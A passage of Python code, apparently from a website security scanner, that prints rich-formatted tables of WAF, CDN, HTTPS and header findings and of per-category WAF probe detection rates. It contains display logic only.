    color = "green" if waf == "None detected" else "cyan"
    reason = f"  ({r['waf_match_reason']})" if r.get("waf_match_reason") else ""
    table.add_row(
        "WAF / Bot Protection",
        f"[{color}]{waf}[/{color}]{reason}",
        r.get("waf_notes", ""),
    )

    wafw00f = r.get("wafw00f", {})
    if wafw00f.get("detected"):
        wafw00f_str = ", ".join(wafw00f["waf_names"])
        table.add_row("wafw00f Fingerprint", f"[bold green]{wafw00f_str}[/bold green]",
                      "Dedicated WAF fingerprinter")
    elif wafw00f.get("error"):
        table.add_row("wafw00f Fingerprint", f"[dim]{wafw00f['error']}[/dim]", "")
    else:
        table.add_row("wafw00f Fingerprint", "[dim]None detected[/dim]",
                      "Dedicated WAF fingerprinter")

    mode  = r["blocking_mode"]
    mcolor = "green" if "ACTIVE" in mode else "red"
    table.add_row("Blocking Mode", f"[{mcolor}]{mode}[/{mcolor}]", "")

    cdn   = r["cdn_detected"]
    ccolor = "cyan" if cdn != "None detected" else "dim"
    table.add_row("CDN", f"[{ccolor}]{cdn}[/{ccolor}]", "")

    table.add_row("Tech Stack",   ", ".join(r["tech_stack"]) or "Unknown", "")
    table.add_row("HTTPS",        "Enforced" if r["https_enforced"] else "Not enforced", "")
    table.add_row("HSTS",         "Present" if r["hsts"] else "Missing", "Add Strict-Transport-Security")
    table.add_row("robots.txt",   "Found" if r["robots_txt"] else "Not found", "")
    table.add_row("sitemap.xml",  "Found" if r["sitemap_xml"] else "Not found", "")
    if r["rate_limit_headers"]:
        table.add_row("Rate-Limit Headers", str(r["rate_limit_headers"]), "")

    console.print(table)
    console.print()

    # ── Per-category WAF detection rate table ─────────────────────────────────
    stats = r.get("category_stats", [])
    if not stats:
        return

    total_probes  = sum(s["total"]   for s in stats)
    total_blocked = sum(s["blocked"] for s in stats)
    overall_rate  = round(total_blocked / total_probes * 100) if total_probes else 0

    cat_table = Table(
        title=f"WAF Detection Rate  ({total_blocked}/{total_probes} probes blocked — overall {overall_rate}%)",
        show_header=True, header_style="bold cyan",
    )
    cat_table.add_column("Attack Category",   style="bold white", width=22)
    cat_table.add_column("Probes", justify="right", width=7)
    cat_table.add_column("Blocked", justify="right", width=8)
    cat_table.add_column("Detection Rate", width=20)
    cat_table.add_column("Verdict", width=16)

    for s in sorted(stats, key=lambda x: x["detection_rate"]):
        rate = s["detection_rate"]
        if rate == 0:
            bar_color, verdict = "red",    "CRITICAL — 0%"
        elif rate < 50:
            bar_color, verdict = "yellow", "WEAK"
        elif rate < 80:
            bar_color, verdict = "yellow", "PARTIAL"
        else:
            bar_color, verdict = "green",  "GOOD"

        filled = round(rate / 10)
        bar    = "█" * filled + "░" * (10 - filled)
        cat_table.add_row(
            s["category"],
            str(s["total"]),
            str(s["blocked"]),
            f"[{bar_color}]{bar}[/{bar_color}] {rate}%",
            f"[{bar_color}]{verdict}[/{bar_color}]",
        )

    console.print(cat_table)
    console.print()
